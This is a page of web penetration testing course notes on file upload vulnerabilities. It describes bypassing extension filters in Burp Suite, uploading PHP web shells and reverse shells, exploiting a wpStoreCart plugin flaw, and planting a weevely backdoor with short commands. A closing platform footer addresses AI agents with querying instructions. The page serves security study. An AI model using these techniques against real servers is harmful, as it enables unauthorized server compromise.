> For the complete documentation index, see [llms.txt](https://dev-angelist.gitbook.io/ewptv2-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dev-angelist.gitbook.io/ewptv2-notes/readme/system-security-3/7.1-file-upload-vulnerability.md).

# 7.1 File Upload Vulnerability

## File Upload Vulnerability

File Upload Vulnerability also know as Arbitrary File Upload is a type of security flaw in web app that allows an attacker to upload and execute malicious files on a web server.

In this case an attacker identifies the file upload functionality in the target app and attempts to upload a malicious file (malicious code, scripts, shell, malware).

As the same, the vulnerability arises when the app fails to validate and secure the uploaded files, not restricting the scope of files extensions permitted.

This can have a dangerous impact, including unauthorized access to sensitive data, server compromise and complete system control.

### Discover file upload functionality

To start we need to find a file upload functionality in a web app page, we can use tools such as: dirboster, gobuster, wefuzz, etc..

{% content-ref url="/spaces/iS3hadq7jVFgSa8k5wRA/pages/9Qv5XGp3s79duUXXFzlN" %}
[Gobuster](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/gobuster)
{% endcontent-ref %}

### Bypassing File Upload extension filters

If there's a file upload function we can try to upload a file, and capture request using burp suite to understand very well the process.

Of course if we can upload 'malicious' file to obtain access (e.g. php file) we've just win, but if a web app as a minimum of security design there's an extension filters condition to prevent upload of undesidered file extensions.

<figure><img src="/files/DVD0hvlKKUSBOpZulURh" alt=""><figcaption></figcaption></figure>

in this case we can only to upload JPG, PNG and BMP file extensions, then we can upload a .php file and capture request via Burp Suite.

Of course, we received again an upload error, but via Burp Suite we can change this request parameter: filename="shell.php" to "shell.jpg" and keep unaltered the Content-Type (that contains php) and forward request.&#x20;

<figure><img src="/files/gPFBsYqwNlgLv9cMzAXm" alt=""><figcaption></figcaption></figure>

With this solution in a bad web app we can bypass file upload extension filters.

To execute file uploaded we need to indicate into URL the original file name with the .jpg extension, and consequently add / with file with .php extension (shell.jpg/shell.php)

<figure><img src="/files/fgEX7qQFzvX4cCQ8pHf3" alt=""><figcaption></figcaption></figure>

#### Bypassing PHPx blacklist

It's possible that an upload form permit you to upload a .php file but interpretate it as data file without execution of php code, infact if we try to open it browser will display php code).

In this case, we can investigate with Burp Suite capturing the upload POST request and we see that there's `X-Powered-By: PHP/5.5.9-lubuntu4.25`

Then, we can solve this matter uploading a different file php, checking on this website

{% embed url="<https://www.revshells.com/>" %}

Remember, that in Kali Linux there're PHP webshells ready for use usally into location /usr/share/webshells/php  and we can upload simple-backdoor.php and get remote code execution via browser

<figure><img src="/files/LfdNeEQmCv1AccnRXsA9" alt=""><figcaption></figcaption></figure>

or use a reverse shell via php-reverse-shell.php file and modify the content change attacker IP and attacker port in listening with netcat.

{% hint style="info" %}
In addition, we can use Burp Suite Intruder to brute force file extensions and nderstand which extensions are allowed or not.
{% endhint %}

### WordPress wpStoreCart File Upload

When there's a website that use a cms as WordPress, we can try to analyze it using wpscan: `wpscan --url <website>`

if in the scan result we discover a plugin called: wpstorecart.

In some versions of wpStoreCart (2.5.27-2.5.29), there might be an insecure implementation of file upload features. This can happen if the plugin does not properly validate or sanitize the files being uploaded by users.

{% embed url="<https://www.exploit-db.com/exploits/19023>" %}

Using this exploit we can upload arbitrary malicious file (backdoor, reverse shell, etc).

In the case of reverse shell it's possible to use netcat or another great tool called: weevely, following these steps:

* Generate new agent -> `weevely generate password ~/Desktop/login.php` (login.php is the same filename present into script)

<figure><img src="/files/mEfMAGkeW5nEDLE2c37u" alt=""><figcaption></figcaption></figure>

* Execute exploit -> `php -f exploit.php`
* Take in listening -> `weevely <website url>`
* Execute login on the upload page clicking on /wp-content/uploads/wpstorecart/login.php
* We obtain shell session on weevely

In alternative, we can upload it using `curl -F "Filedata=@./test.php" <website url /wp-content/uploads/wpstorecart/login.php` and execute weevely.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://dev-angelist.gitbook.io/ewptv2-notes/readme/system-security-3/7.1-file-upload-vulnerability.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.